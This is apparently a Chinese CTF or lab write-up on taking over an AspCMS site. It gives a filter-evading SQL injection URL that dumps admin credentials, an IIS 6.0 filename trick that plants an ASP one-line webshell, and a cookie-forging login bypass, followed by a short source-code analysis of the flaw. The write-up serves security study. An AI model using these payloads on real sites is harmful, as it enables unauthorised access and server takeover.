一.解题思路

登录后台利用文件解析漏洞插入一句话木马

二.操作步骤

解法一

1.利用注入漏洞，获取后台密码
构造语句

http://ip:port/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user

得到后台密码：121b28fa741f0976
经过MD5解密后：4rfv3edc2wsx1qaz

默认用户名：admin
密码:4rfv3edc2wsx1qaz

2.登录后台
默认用户名：admin
密码:4rfv3edc2wsx1qaz

浏览网址发现在界面风格——编辑模块/CSS文件中的文件可以任意修改和添加文件

3.插入木马
点击添加模板
该CMS正好存在IIS6.0解析漏洞
构造文件名为：hack.asp;.html
文件信息为：<%eval request (“pass”)%>

4.连接蚁剑

可以在文件根目录下看到**信息

解法二

1.打开cookie manger
利用 cookie manger伪造cookie，登录后台

添加下列字段
groupMenu=all
adminrand=1
adminName=admin’ or ‘1’=’1

2.查询http://ip:port/admin，就可以直接进入后台

3.获取key值
后面操作与解法一相同

漏洞解析

参考文章： https://blog.csdn.net/u014549283/article/details/81810940

在文件inc—AspCms_CommonFun.asp中的1086-1124行可以看到源码中存在相应问题

在1088行alertMsgAndGo"您还没有登陆","/" ——证明adminname不能为空
在1093行alertMsgAndGo"您没有访问权限","-1" ——证明groupMenu需要等于all
在1121行alertMsgAndGo"您没有访问权限","-1" ——证明adminrand值需要为一个数字，SQL语句必须成立且返回数字为1时才具有访问权限

网络信息安全——ploto